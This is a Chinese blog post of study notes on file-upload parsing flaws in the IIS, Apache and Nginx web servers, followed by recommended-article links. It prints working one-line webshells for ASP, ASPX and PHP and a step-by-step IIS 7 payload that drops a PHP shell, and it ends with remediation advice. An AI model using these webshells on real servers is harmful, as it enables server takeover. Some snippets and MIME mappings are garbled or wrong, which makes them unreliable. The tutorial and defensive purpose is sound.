中间件解析漏洞

最新推荐文章于 2024-04-06 23:52:19 发布
最新推荐文章于 2024-04-06 23:52:19 发布
阅读量468 收藏 2
点赞数
分类专栏: web安全 文章标签: 中间件 apache nginx weblogic iis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45486362/article/details/105974445
版权

上传漏洞

常见中间件
	IIS
	解析漏洞:
		目录解析(IIS 5.x/6.0)
			/xx.asp/xx.jpg	将jpg按照asp解析
			/xx.asp/xx.*
		文件解析
			xx.asp;.jpg	分号前的后缀视为不见
		默认解析(IIS 6.0)		黑名单是可能被忽略
			/wooyun.asa	进行访问
			/wooyun.cer	进行访问
			/wooyun.cdx	对文件的下载(和浏览器有关,QQ浏览器可以解析)
		畸形解析(IIS 7.0/7.5)
			备注:可以在url目录遍历中发现有fckeditor即可判断有上传权限,可以尝试上传漏洞攻击
			利用条件:
				Fast-CGI开启	黑盒只管尝试
					phpinfo.php 可以看
			1.上传sp.jpg,内容为:
				<?php fputs(fopen('shell.php','w')
				,<?php eval($_POST[cmd])?>');?>
			2.访问sp.jpg,在这个目录下就会生成一句话木马shell.php
			
			3.最后再拿软件连接后台

	Nginx		加载java代码
	Apache		加载php
		解析漏洞:
			原理:从右到左开始判断解析,如果识别不可解析,就再往左判断
			          Apache解析后缀phtml,pht,php3,php4和php5,,都是按照php解析(这些上传都可以绕过黑名单)
			
	weblogic		


一句话木马:
	asp:	<%eval request("pass)%>
	aspx:	<%@ Page Language%><%eval(Request.Item["pass"]."unsafe):%>
	php:	<?php @eval($_POST['pass']);?>

	MIME:
		常见类型:
			JPEG类型		image/jpeg	.jpeg/.jpg
			超文本标记语言	.html/.htm	text/html
			TAR文件		.tar		application/x-rar
			下载文件类型	.exe		application/octet-stream

修复方案:
	1.白名单检查文件扩展名,不属于白名单内的,不允许上传
	2.上传文件的保存目录不可解析jsp,php等脚本语言
		apache:
			1.找到配置文件httpd.conf
			2.<Directory "c:/wwwroot/shangchaun/upload">
				AllowOverride None
				Options None
				Order allow,deny
				Deny from all
			   </Directory>
			3.重启apache服务

	3.文件名随机命名,不允许用户自定义
凉水沏茶
关注
专栏目录
【网络安全】网站中间件存在解析漏洞
你在看屏幕的同时,屏幕也在注视着你
07-24 1713
常见的中间件解析漏洞
第一节 中间件解析漏洞-IIS6.0-01
09-15
"中间件解析漏洞-IIS6.0-01" 中间件解析漏洞是指在Web应用程序中,因服务器或中间件解析机制存在漏洞,导致攻击者可以上传恶意文件,从而控制服务器或获取敏感信息。下面将对IIS6.0中间件解析漏洞进行详细介绍。 ...
中间件解析漏洞(服务器配置错误)
最新发布
m0_69043895的博客
04-06 1411
AddType :在给定的文件扩展名与特定的内容类型之间建立映射AddType 是与类型表相关的,描述的是扩展名与文件类型之间的关系,例如:AddType application/x-httpd-php .jpg ,表示 .jpg 扩展名的文件就是 application/x-httpd-php 类型的。也就是说 php3 , php4 , php5 , pht , phtml 等文件后缀也是可以被当作 php 文件进行解析的。上传成功后直接访问,此时可以看到,info.php.uiottd已经成功执行。
中间件】一些中间件的相关漏洞总结
Monsterlz123的博客
07-16 2215
中间件】一些中间件的相关漏洞总结 Hello,各位小伙伴晚上好~ 这里是你们连续三天发文,高产似母猪的小编。 今天跟大家唠唠一些常见的中间件漏洞 包括常见的IISApacheNginx以及Tomcat 废话不多说,让我们直接开始吧~ (好啦我承认今天的表情包是因为好想去迪斯尼,难道是上年纪了吗,嗯?) 目录 一、IIS IIS 6.0 解析漏洞 IIS 7.5 解析漏洞 IIS 6...
解析漏洞——中间件
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-21 4130
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
解析漏洞——中间件(转载)
Solomwn的博客
08-25 989
目录 解析漏洞简介 解析漏洞 1、IIS 5.x/6.0解析漏洞 文件 1.html aa.asp 11.cer 利用方法 2、IIS 6.0 1.目录解析 2.文件解析 3、IIS 7.0/IIS 7.5/nginx0.8.3解析漏洞 bb.jpg 4、Nginx <0.8.03 空字节代码执行漏洞 5、apache解析漏洞 解析漏洞简介 解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。 该漏洞一般配合服务器的文件上传功能使用,以获取服务器的
Web中间件常见漏洞总结.pdf
06-14
1. IIS解析漏洞 IIS解析漏洞主要存在IIS6.x版本中。服务器配置不当会导致解析问题,例如,当文件名包含“*”符号时,IIS服务器会忽略“*”后的所有内容。例如“file.asp;.jpg”会被当作“file.asp”来处理。此外,...
web中间件常见漏洞分析
08-17
IIS解析漏洞指的是IIS在处理特定请求时的一种错误解析机制,它可以被攻击者利用来执行恶意代码或者绕过安全限制。例如,IIS6.x版本存在一个解析漏洞,该漏洞会导致服务器错误地将某些具有特定格式的文件名或文件夹名...
Web中间件常见漏洞总结(免积分)
02-09
在本文中,我们将深入探讨Web中间件中常见的安全漏洞,并提供相应的防范策略。 一、跨站脚本(XSS)攻击 XSS攻击是通过在网页中注入恶意脚本来实现的,攻击者可以获取用户敏感信息,如登录凭据。防范XSS攻击的关键...
express中间件当做前端服务器的安全漏洞处理
02-27
然而,如果不正确配置或使用中间件,可能会引入安全漏洞。本篇文章将深入探讨Express中间件中可能存在的安全问题,并提供一些处理这些问题的方法。 一、Express中间件的理解与使用 Express中间件是一种函数,它接收...
中间件(apache,iis,nginx)解析漏洞总结
baynk的博客
11-30 1476
0x00 前言 早就想总结一下了,虽然网上也有很多,但是自己复现过效果还是会不一样的。 分别三个部分,分别是apacheiisnginx,说实在话,都是些老掉牙的东西,又不能不学,头疼。 0x01 apache apache一般在linux中和apache+php+mysql一起用的比较多,目前我碰到的解析漏洞有两个,一个就是熟知的未知后缀名解析,另一个是apache CVE-2017-15...
常见的中间件漏洞
weixin_52501704的博客
12-09 5501
常见的中间件漏洞
【文件上传漏洞-07】中间件文件解析漏洞概述及实例——ApacheIISNginx
m0_64378913的博客
07-12 3353
(1)第一种:未知扩展名解析漏洞 Apache对文件的解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析为PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
常见中间件漏洞的总结
qq_40898302的博客
06-07 9165
常见中间件漏洞总结
渗透测试-中间件解析漏洞分析
lza20001103的博客
04-27 4056
中间件解析漏洞分析
中间件解析漏洞总结
qq_61553520的博客
04-20 285
这一篇和我的另外一篇文文件上传漏洞是互为姊妹篇,在利用思路会相互补充。文件上传漏洞的另外一些特殊情况,上传的文件检测严格,只能常规上传图片,但是如果中间存在一些解析漏洞的话我们就可以利用解析漏洞进行上传后门。
Web中间件常见漏洞总结
qq_35358965的博客
05-09 2913
是一类提供系统软件和应用软件之间的连接,便于软件各部件之间的沟通的软件,应用软件可以借助中间件在不同的技术架构之间共享信息和资源。中间件位于客户机服务器的操作系统之上,管理着计算资源和网络通信。中间件=平台+通信。
【网络安全 --- web服务器解析漏洞IISApacheNginx中间件常见解析漏洞
m0_67844671的博客
11-06 3965
【网络安全 --- web服务器解析漏洞IISApacheNginx中间件常见解析漏洞,讲解了中间件的常见解析漏洞及修复方案
常见的中间件解析漏洞
09-27
常见的中间件解析漏洞包括: 1. IIS 6.0的文件解析漏洞:当处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这个漏洞可以通过在文件名后添加特定的字符串进行利用。 2. Apache的多后缀解析漏洞Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别时,Apache会继续向左识别。攻击者可以利用这个漏洞来执行恶意代码,通过构造特定的文件名来绕过文件类型检测。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉水沏茶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值